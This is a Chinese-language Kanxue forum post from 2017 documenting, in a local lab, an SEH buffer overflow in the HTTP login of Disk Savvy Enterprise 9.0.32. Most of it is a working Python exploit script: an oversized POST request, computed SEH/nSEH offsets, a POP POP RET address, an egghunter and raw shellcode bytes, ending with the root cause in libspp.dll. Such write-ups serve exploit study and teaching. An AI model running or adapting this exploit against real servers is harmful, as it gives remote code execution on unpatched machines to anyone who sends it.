看雪论坛
发新帖
2

[原创]Disk Savvy Enterprise 9.0.32(SEH溢出)

shuozhang 2017-3-4 10:31 470

漏洞:https://www.exploit-db.com/exploits/40459/

Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow

环境:VirtualBox Win7企业版 + Disk Savvy Enterprise 9.0.32 + immunity debugger + ida

Disk Savvy Enterprise 9.0.32,运行。界面:

这只是这个软件的客户端,设置一下,打开软件的http服务

immunity 附加进程disksvs.exe进程

import socket
import sys
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.114',80))
 
 
evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "A" * 20000
s.send(evil)
s.close()

程序出现异常,seh链,已经被覆盖为AAAA。

接下来构造seh的payload:

[junk][nSEH][SEF][nop+shellcode]

接下来要搞定触发异常的大小,SEH位置,"POP POP RET"

evil += "&password=aaaaa\r\n"
evil += "A" * 12000
evil += "\x90" * 10000

触发异常,算一下seh的地址,相差 2292

用mona.py [!mona seh]插件找一下"POP POP RET"

更改payload为

```
seh = "\xac\x43\x0c\x10"
nseh = "\xEB\x0B\x90\x90"
evil += "A" * 14292
evil += nseh
evil += seh
evil += "\x90" * 10000
s.send(evil)
s.close()
```

成功执行,但是可以放置shellcode的内存太小,用egghunt的方式去寻找内存中的shellcode,然后去执行。

egghunt的代码

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
egg = "w00tw00t"

最后加上payload

```
import socket
import sys
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.114',80))
 
seh = "\xac\x43\x0c\x10"
nseh = "\xEB\x0B\x90\x90"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
 
evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "A" * 14057 
evil += "w00tw00t"
evil += shellcode
evil += nseh
evil += seh
evil += egghunter
evil += "\x90" * 10000
s.send(evil)
s.close()
```


最后,有问题的是libspp.dll模块的getnextstring函数,把接受到的值赋给堆地址a5触发了异常。


本主题帖已收到 0 次赞赏,累计¥0.00
最新回复 (0)
返回



©2000-2017 看雪学院 | Based on Xiuno BBS | 知道创宇带宽支持 | 微信公众号:ikanxue
Time: 0.014, SQL: 8 / 京ICP备10040895号-17